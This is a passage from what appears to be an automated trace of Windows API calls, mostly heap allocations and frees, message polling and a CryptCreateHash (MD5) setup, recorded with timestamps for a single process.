[0257.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a78 [0257.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0257.788] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0257.788] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0257.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0257.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0257.788] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0257.788] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0257.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0257.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0257.788] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0257.788] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0257.788] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0257.789] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0257.789] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0257.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0257.789] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0257.789] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0257.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0257.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0257.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0257.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ce0 [0257.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0257.789] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0257.789] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0257.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0257.789] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0257.789] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0257.789] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0257.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0257.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0257.790] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0257.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0257.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0257.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0257.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0257.790] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0257.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0257.790] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51868, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0257.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0257.790] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0257.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0257.790] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0257.790] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a68 [0257.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0257.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0257.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0257.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0257.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0257.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0257.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0257.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0257.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0257.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0257.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0257.791] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0257.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0257.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0257.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0257.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0257.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0257.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0257.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0257.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0257.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0257.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0257.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0257.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0257.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0257.791] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0257.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0257.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0257.791] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0257.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0257.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0257.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0257.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0257.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0257.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0257.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0257.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0257.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515f8 [0257.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0257.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0257.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0257.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0257.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515f8 | out: hHeap=0x970000) returned 1 [0257.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0257.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0257.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0257.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0257.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515c8 | out: hHeap=0x970000) returned 1 [0257.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0257.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0257.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0257.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0257.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0257.792] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0257.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0257.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0257.792] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0257.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0257.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0257.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0257.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0257.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0257.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0257.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0257.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0257.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0257.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0257.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0257.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0257.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0257.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0257.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0257.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0257.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0257.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0257.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0257.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0257.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0257.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0257.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0257.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0257.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0257.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0257.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0257.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0257.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0257.793] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0257.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0257.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0257.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0257.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978270 [0257.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e561a8 | out: hHeap=0x970000) returned 1 [0257.794] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0257.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0257.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0257.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0257.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0257.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0257.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0257.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0257.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0257.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0257.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0257.794] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0257.794] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0257.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0257.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0257.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0257.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0257.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0257.794] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0257.794] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0257.794] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0257.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0257.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0257.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0257.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0257.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0257.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0257.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0257.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0257.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0257.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0257.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0257.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54dd8 [0257.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0257.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0257.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0257.795] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0257.795] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54e08, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0257.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0257.795] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0257.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0257.863] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0257.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0257.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0257.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0257.863] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0257.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0257.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0257.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0257.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0257.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0257.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0257.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0257.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0257.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0257.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0257.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0257.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0257.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0257.864] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0257.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0257.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0257.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0257.864] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0257.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977cf8 [0257.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0257.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0257.864] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0257.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0257.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0257.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0257.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0257.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0257.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0257.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0257.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0257.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0257.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0257.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0257.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0257.865] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54df8 [0257.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0257.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0257.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0257.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0257.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0257.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0257.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0257.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0257.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0257.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0257.865] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: 